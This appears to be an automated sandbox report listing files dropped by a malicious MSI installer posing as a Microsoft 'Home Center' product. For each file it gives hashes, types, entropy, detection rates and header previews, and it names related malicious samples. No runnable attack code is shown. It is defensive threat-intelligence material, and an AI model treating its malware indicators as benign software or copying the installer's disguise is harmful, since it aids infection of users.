                                              SHA1:9533E30F829915C72B05DE40FF0A3B77A92955ED
                                              SHA-256:A9DCADD2551D5497467AD81F086E742E941E8532D90E31BF6C6D7435D1690A72
                                              SHA-512:F60A175A9F10A11110B5AD628F41731AB0FE02459A893556B5394A653EA686FFB81FF28DF0A38C42786A50BF26FAEE4CCC6D8359256874F239362E7D2AF615A0
                                              Malicious:false
                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="677440" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:Mini DuMP crash report, 14 streams, Wed Jan 15 19:37:51 2025, 0x1205a4 type
                                              Category:dropped
                                              Size (bytes):42734
                                              Entropy (8bit):2.7583476222342225
                                              Encrypted:false
                                              SSDEEP:192:yOkfQ2X5rT2U+SnOg3vhmfFRLyyVfiO3mt6bFTo3u4w6Z/5v55E:OpT2U+Pgf8fj2Cp3jeZhvDE
                                              MD5:55E028C5726FAB38F5C133A63392C56E
                                              SHA1:933EEB2FB44391D607F29939963114A486228BB3
                                              SHA-256:8401E8E746E43FA42749D80A0CF94A5BCF4C21A3201CCF2B5D047F9BFC5F87D9
                                              SHA-512:4840499E3BDE0A9EE46D1941ECEB3054734E001497F9AA566CB71EE00BA05B96237FC23DFDF8427C152C14BE355DD87F33818DA8D130E8E0E356DF1DFBCD0847
                                              Malicious:false
                                              Preview:MDMP..a..... ..........g............4...............<............6..........T.......8...........T............-...y...........&...........'..............................................................................eJ.......(......GenuineIntel............T..........."..gN............................ ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):8384
                                              Entropy (8bit):3.700843068040942
                                              Encrypted:false
                                              SSDEEP:192:R6l7wVeJKjV6q6YEIaSUvV0GgmfP6tpD089bCJsf7N2m:R6lXJsV6q6YEFSUPgmfP65Cif7l
                                              MD5:E8C89CE4F27FB2CCB2403E23BF7050A4
                                              SHA1:200F37A68EDD98376DB5AD34E7543B76EC4C2144
                                              SHA-256:34CB912A713A103303F88A24AA94800498914C7A6A0C069F6ECCB8432ECDEB34
                                              SHA-512:062AD222C6E09A72D7593DCE3EFC73A7D71CF27835F86018BDEF165B7A228D246695DC54A6A4DBDAC0DEF6C9C71F6941194C1FADB4CF66DEB14239043A8E4224
                                              Malicious:false
                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.5.0.8.<./.P.i.
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):4630
                                              Entropy (8bit):4.476284301459792
                                              Encrypted:false
                                              SSDEEP:48:cvIwWl8zseJg77aI9GBWpW8VYJ/Ym8M4JS5Iq1Fpjsi+q8enEqjBaYrrI9N9d:uIjfUI7IQ7VVJWIqKizEqjBaYrrmN9d
                                              MD5:BBF0FAA4AD96333C1F6404968E5CA057
                                              SHA1:6F2C11543522F28E3856A0390C28A783DB6E39E3
                                              SHA-256:2E270AD3CEA9C1389D192A28A8C605837A71A62A0087AF92C0B761597AFABF79
                                              SHA-512:64A3DB1BBB9DCF670622FC4B1A5A868547FD4D1E3421A1158DD1628186619DD2DD0931DEF839CD371EF622A47524B206802EAC39F7E032E5565553D2318F3268
                                              Malicious:false
                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="677440" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                              Process:C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):32
                                              Entropy (8bit):4.288909765557392
                                              Encrypted:false
                                              SSDEEP:3:1EypyQrqK7Bov:1XpyQrqK7w
                                              MD5:00D74DDE674E92D74BB371D9F9E366D9
                                              SHA1:D5DC81A0D80303CA16504088416ADF2D16B972FE
                                              SHA-256:7D9AD8EC5E14878C461E8D8BEEA157639B4ABA9A784E74A5BC18841731FA8EB4
                                              SHA-512:6FBF6804587174B8F9DBAAEF1D0A782DC3204F7F15B1F4BCBB955AB3E78E9482C334DCD6FD63FD16899BC96A2B2E9A2E0BD675062EF183DADA130D203DA2FF2B
                                              Malicious:false
                                              Preview:[Generate Pasta]..CBNMTnSHeuTd..
                                              Process:C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe
                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                              Category:modified
                                              Size (bytes):4722
                                              Entropy (8bit):5.16192639844512
                                              Encrypted:false
                                              SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g5O8b7A9I5:JsUOG1yNlX6ZzWpHOo/iP16CbM1k
                                              MD5:387B4FC78ABB97F378C5299D4D2CE305
                                              SHA1:6F2995FC620AB520C9EE1CA7244DF57367F983A2
                                              SHA-256:030209A13E2C84118139ABF0C4F08DBD203B4C802C7B73B74851860D79DF9CB7
                                              SHA-512:592D5E3FB7C78420F648281D87B0B303773749B8E0D3621A493ACAE257E2C1E77B782F3D6DAA0C2B3D37CBB4865B382617AF744E34F66C0F3E522DBCA7D71AAE
                                              Malicious:false
                                              Preview:.//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                                              Process:C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe
                                              File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1612
                                              Entropy (8bit):4.869554560514657
                                              Encrypted:false
                                              SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                                              MD5:DFEABDE84792228093A5A270352395B6
                                              SHA1:E41258C9576721025926326F76063C2305586F76
                                              SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                                              SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                                              Malicious:false
                                              Preview:.body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
                                              Process:C:\Users\user\AppData\Roaming\@MicrosoftHome\Home Center\Wi-fii Corporativo.exe
                                              File Type:HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):1681
                                              Entropy (8bit):4.567538112791388
                                              Encrypted:false
                                              SSDEEP:24:rC7cWhfs5mVM4mVMyIjmgAV28EFP8hRqh/k+CkE03vjqX:u7o5V4VtihV2lFUWlEqvj6
                                              MD5:C74D57042D3614B92F2E0AF783ACD5DE
                                              SHA1:415F8A0F5DBD61D622724034C182C0B15E80CD20
                                              SHA-256:05182A8C3A558E671705B8A8421712A9715A1D597606E3710A6D6CFEB00FB462
                                              SHA-512:F33BC2CDA990B07FE8EA37A1F68DDDBF5FA9A67CA028019EA4D848B70CC6410D1468E0CE8F8132665124F6E4B8438AFFC41FB562D9E4A1401498E46CD0D1A0EC
                                              Malicious:false
                                              Preview:.<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css">.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="javascript:getInfo();">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>.. <l
                                              Process:C:\Windows\System32\msiexec.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):19128
                                              Entropy (8bit):6.584692888778464
                                              Encrypted:false
                                              SSDEEP:384:nlpXkFiG/kODAxOfRDGleAM+o/8E9VF0Nyjr8:nlp0FiSkqrpDGQAMxkEu
                                              MD5:8AAF6B0EF4409498EAA1F506819285CF
                                              SHA1:FDDFCD3E70E8E26D3C4F25BD5FD0E0EC41E61D9D
                                              SHA-256:95478EE9F1386FD54AF455AD892AC16B35E5A3BEAAEAB9E61CE85278D20DBAD8
                                              SHA-512:93E307A9B157F63D1141D828B6AD93AD7D46DBF3963505ECB2B63FD67C9C09E85E3ADFC76C3DF4C725F30E7F732EAF8D4BE7F524F03DCE5E6A10B7C0C5F52ACE
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......>..Qz.@.z.@.z.@.sf..p.@.A@A.x.@.A@C.{.@.A@E.h.@.A@D.w.@....x.@..@A.y.@.z.A.V.@..@I.{.@..@..{.@..@B.{.@.Richz.@.........PE..L......e..........".................I........ ....@..........................p...........@.................................$%.......P...............&...$...`..<....!..p...........................p!..@............ ...............................text............................... ..`.rdata..h.... ......................@..@.data........0......................@....gfids.. ....@......................@..@.rsrc........P....... ..............@..@.reloc..<....`.......$..............@..B........................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\System32\msiexec.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):22631424
                                              Entropy (8bit):7.960944638650986
                                              Encrypted:false
                                              SSDEEP:393216:Ax/MizKyPRc0TCzzO2fqnyVn9SrNoVfImFIBGI722jhasu1/lwM1ViakY:Ax/MizKyPRZCuiVQMfpGBGorQwTaH
                                              MD5:A03C075EC2D02A406712ECBC828CA98E
                                              SHA1:8F2B6A37800DE2BC944E3D687BFD73754E550681
                                              SHA-256:32530ABFEAEAEFEBDF0715FD098104671D716BB02D609197BEF67C7F4B8B0E8D
                                              SHA-512:B1FFD8C6E78266AFE95F310DD3EC3F7E3FC0542559AB572509A1817174195929C9D5579600F03738A83E3A17DC898691AD4AE91D96E3A8C90F8EF0807DF0002D
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 34%
                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........PE..L.....{g..................A...9......3........B...@...........................g......................................Z......${..@.....g.X.....................g......................................................@..|.....2......................text.....A......................... ..`.itext..8,....A..................... ..`.data...$.....B.....................@....bss....\z...0C..........................idata...;....C.....................@....didata.h.....C.....................@....edata........D.....................@..@.rdata..E.....D.....................@..@.E{7......... D..................... ..`.< a.........@......................@....z}'....P@Y..P...BY................. ..`.rsrc...X.....g......HY.............@..@.reloc........g......LY.............@..B......................{.......{.............@..@........................................................
                                              Process:C:\Windows\System32\msiexec.exe
                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {E5EC307B-28AA-4ABE-BD52-84862F31CDBE}, Number of Words: 10, Subject: Home Center, Author: @MicrosoftHome, Name of Creating Application: Home Center, Template: ;1046, Comments: A base dados do instalador contm a lgica e os dados necessrios para instalar o Home Center., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Mon Jan 6 17:55:54 2025, Last Saved Time/Date: Mon Jan 6 17:55:54 2025, Last Printed: Mon Jan 6 17:55:54 2025, Number of Pages: 450
                                              Category:dropped
                                              Size (bytes):23667712
                                              Entropy (8bit):7.9720569313982494
                                              Encrypted:false
                                              SSDEEP:393216:nkiS2W8FlnP/iiJoNAg/n+HwFdzFUZA5pfSCManDT2w4rzsJ/ADt1fpsybiY05UY:nA2WG/iiJoNAgGHi15UYDafrzS/E65R
                                              MD5:878933DDB3C232AD3D24DF9248D143AD
                                              SHA1:AD166A8895B669A267F8DD05A86F373C29A2CC05
                                              SHA-256:E90CD70336C7763DAAD5CCEF0A171E4E18D745B872331A1E58EC90909E8EBF05
                                              SHA-512:9BEF0A6C8D46118ED7589F97DE5A49F03A17DBB0408E7C5DA38B462A885E60A8D8737FC09CBBDF08ADC5C5ED72C141560F9E99401051B723D1F0A819AD456713
                                              Malicious:false
                                              Preview:......................>...................j...................................F.......c.......o...........................................................................................................................................................................................................................................................................................................................................................................................................................................=...........!...4............................................................................................... ...+..."...#...$...%...&...'...(...)...*...1...,...-......./...0...5...2...3...>...@...6...7...8...9...:...;...<...........?.......A...B...C...D...E...........H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                              Process:C:\Windows\System32\msiexec.exe
                                              File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, MSI Installer, Security: 0, Code page: 1252, Revision Number: {E5EC307B-28AA-4ABE-BD52-84862F31CDBE}, Number of Words: 10, Subject: Home Center, Author: @MicrosoftHome, Name of Creating Application: Home Center, Template: ;1046, Comments: A base dados do instalador contm a lgica e os dados necessrios para instalar o Home Center., Title: Installation Database, Keywords: Installer, MSI, Database, Create Time/Date: Mon Jan 6 17:55:54 2025, Last Saved Time/Date: Mon Jan 6 17:55:54 2025, Last Printed: Mon Jan 6 17:55:54 2025, Number of Pages: 450
                                              Category:dropped
                                              Size (bytes):23667712
                                              Entropy (8bit):7.9720569313982494
                                              Encrypted:false
                                              SSDEEP:393216:nkiS2W8FlnP/iiJoNAg/n+HwFdzFUZA5pfSCManDT2w4rzsJ/ADt1fpsybiY05UY:nA2WG/iiJoNAgGHi15UYDafrzS/E65R
                                              MD5:878933DDB3C232AD3D24DF9248D143AD
                                              SHA1:AD166A8895B669A267F8DD05A86F373C29A2CC05
                                              SHA-256:E90CD70336C7763DAAD5CCEF0A171E4E18D745B872331A1E58EC90909E8EBF05
                                              SHA-512:9BEF0A6C8D46118ED7589F97DE5A49F03A17DBB0408E7C5DA38B462A885E60A8D8737FC09CBBDF08ADC5C5ED72C141560F9E99401051B723D1F0A819AD456713
                                              Malicious:false
                                              Preview:......................>...................j...................................F.......c.......o...........................................................................................................................................................................................................................................................................................................................................................................................................................................=...........!...4............................................................................................... ...+..."...#...$...%...&...'...(...)...*...1...,...-......./...0...5...2...3...>...@...6...7...8...9...:...;...<...........?.......A...B...C...D...E...........H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                              Process:C:\Windows\System32\msiexec.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):1021792
                                              Entropy (8bit):6.608380087035959
                                              Encrypted:false
                                              SSDEEP:24576:ccNkyRsKx6NapcjRh0lhSMXltuGVJ8Wea/xwuC:jNkyRmopy4duG/8Wea/xwuC
                                              MD5:EC6EBF65FE4F361A73E473F46730E05C
                                              SHA1:01F946DFBF773F977AF5ADE7C27FFFC7FE311149
                                              SHA-256:D3614D7BECE53E0D408E31DA7D9B0FF2F7285A7DD544C778847ED0C5DED5D52F
                                              SHA-512:E4D7AAFA75D07A3071D2739D18B4C2B0A3798F754B339C349DB9A6004D031BF02F3970B030CEC4A5F55B4C19F03794B0CE186A303D936C222E7E6E8726FFFFF7
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Joe Sandbox View:
                                              • Filename: 2tytrCyNuF.msi, Detection: malicious, Browse
                                              • Filename: msit.exe, Detection: malicious, Browse
                                              • Filename: msit.msi, Detection: malicious, Browse
                                              • Filename: Fact30.NATURGY.LUNESGRLNOPAGOID3012021414252024.MSI.msi, Detection: malicious, Browse
                                              • Filename: Fact28.NATURGY.SABADONOPAGOID28122024.MSI.msi, Detection: malicious, Browse
                                              • Filename: bmouJCkvam.msi, Detection: malicious, Browse
                                              • Filename: FS-SZHAJCVS.msi, Detection: malicious, Browse
                                              • Filename: FS-JFDIBGWE.msi, Detection: malicious, Browse
                                              • Filename: , Detection: malicious, Browse
                                              • Filename: , Detection: malicious, Browse
                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L...l..f.........."!...).....`............... ......................................Di....@A............................L...,...@....................Z..`=......h....K..p....................L...... K..@............ ...............................text...Z........................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..h...........................@..B................................................................................................................................................................................................................................
                                              Process:C:\Windows\System32\msiexec.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):1021792
                                              Entropy (8bit):6.608380087035959
                                              Encrypted:false
                                              SSDEEP:24576:ccNkyRsKx6NapcjRh0lhSMXltuGVJ8Wea/xwuC:jNkyRmopy4duG/8Wea/xwuC
                                              MD5:EC6EBF65FE4F361A73E473F46730E05C
                                              SHA1:01F946DFBF773F977AF5ADE7C27FFFC7FE311149
                                              SHA-256:D3614D7BECE53E0D408E31DA7D9B0FF2F7285A7DD544C778847ED0C5DED5D52F
                                              SHA-512:E4D7AAFA75D07A3071D2739D18B4C2B0A3798F754B339C349DB9A6004D031BF02F3970B030CEC4A5F55B4C19F03794B0CE186A303D936C222E7E6E8726FFFFF7
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L...l..f.........."!...).....`............... ......................................Di....@A............................L...,...@....................Z..`=......h....K..p....................L...... K..@............ ...............................text...Z........................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..h...........................@..B................................................................................................................................................................................................................................
                                              Process:C:\Windows\System32\msiexec.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):1021792
                                              Entropy (8bit):6.608380087035959
                                              Encrypted:false
                                              SSDEEP:24576:ccNkyRsKx6NapcjRh0lhSMXltuGVJ8Wea/xwuC:jNkyRmopy4duG/8Wea/xwuC
                                              MD5:EC6EBF65FE4F361A73E473F46730E05C
                                              SHA1:01F946DFBF773F977AF5ADE7C27FFFC7FE311149
                                              SHA-256:D3614D7BECE53E0D408E31DA7D9B0FF2F7285A7DD544C778847ED0C5DED5D52F
                                              SHA-512:E4D7AAFA75D07A3071D2739D18B4C2B0A3798F754B339C349DB9A6004D031BF02F3970B030CEC4A5F55B4C19F03794B0CE186A303D936C222E7E6E8726FFFFF7
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L...l..f.........."!...).....`............... ......................................Di....@A............................L...,...@....................Z..`=......h....K..p....................L...... K..@............ ...............................text...Z........................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..h...........................@..B................................................................................................................................................................................................................................
                                              Process:C:\Windows\System32\msiexec.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):1021792
                                              Entropy (8bit):6.608380087035959
                                              Encrypted:false
                                              SSDEEP:24576:ccNkyRsKx6NapcjRh0lhSMXltuGVJ8Wea/xwuC:jNkyRmopy4duG/8Wea/xwuC
                                              MD5:EC6EBF65FE4F361A73E473F46730E05C
                                              SHA1:01F946DFBF773F977AF5ADE7C27FFFC7FE311149
                                              SHA-256:D3614D7BECE53E0D408E31DA7D9B0FF2F7285A7DD544C778847ED0C5DED5D52F
                                              SHA-512:E4D7AAFA75D07A3071D2739D18B4C2B0A3798F754B339C349DB9A6004D031BF02F3970B030CEC4A5F55B4C19F03794B0CE186A303D936C222E7E6E8726FFFFF7
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L...l..f.........."!...).....`............... ......................................Di....@A............................L...,...@....................Z..`=......h....K..p....................L...... K..@............ ...............................text...Z........................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..h...........................@..B................................................................................................................................................................................................................................
                                              Process:C:\Windows\System32\msiexec.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):1021792
                                              Entropy (8bit):6.608380087035959
                                              Encrypted:false
                                              SSDEEP:24576:ccNkyRsKx6NapcjRh0lhSMXltuGVJ8Wea/xwuC:jNkyRmopy4duG/8Wea/xwuC
                                              MD5:EC6EBF65FE4F361A73E473F46730E05C
                                              SHA1:01F946DFBF773F977AF5ADE7C27FFFC7FE311149
                                              SHA-256:D3614D7BECE53E0D408E31DA7D9B0FF2F7285A7DD544C778847ED0C5DED5D52F
                                              SHA-512:E4D7AAFA75D07A3071D2739D18B4C2B0A3798F754B339C349DB9A6004D031BF02F3970B030CEC4A5F55B4C19F03794B0CE186A303D936C222E7E6E8726FFFFF7
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......ia.p-..#-..#-..#].."!..#].."...#=..":..#=.."<..#=.."b..#].."7..#]..",..#].."...#-..#...#e.."T..#e..",..#e..#,..#-.g#,..#e..",..#Rich-..#........................PE..L...l..f.........."!...).....`............... ......................................Di....@A............................L...,...@....................Z..`=......h....K..p....................L...... K..@............ ...............................text...Z........................... ..`.rdata....... ......................@..@.data....(..........................@....fptable............................@....rsrc...............................@..@.reloc..h...........................@..B................................................................................................................................................................................................................................
                                              Process:C:\Windows\System32\msiexec.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):3226
                                              Entropy (8bit):5.480386025749827
                                              Encrypted:false
                                              SSDEEP:96:prAZagEakISWhygh1i6PpITshuivUMfIF8nJ:prZIRh1ijowm
                                              MD5:B6B4E9D538539688FB1732768C487EC6
                                              SHA1:4A1D7EAB7C1590C578F9F24061BFA996F7B5DBAB
                                              SHA-256:0DA5315C3137C76CF36FEE73BAC9E07B4F842D014F4E41689E28AA6C65542E24
                                              SHA-512:604425F963914CD274A9F64F077C29CF2B7B81CFE2B66ACAE53F5A2C905404BC1E9819079D6AE016669DE8F844D97DC4D52682560F2401A93F8C517B8F65E909
                                              Malicious:false
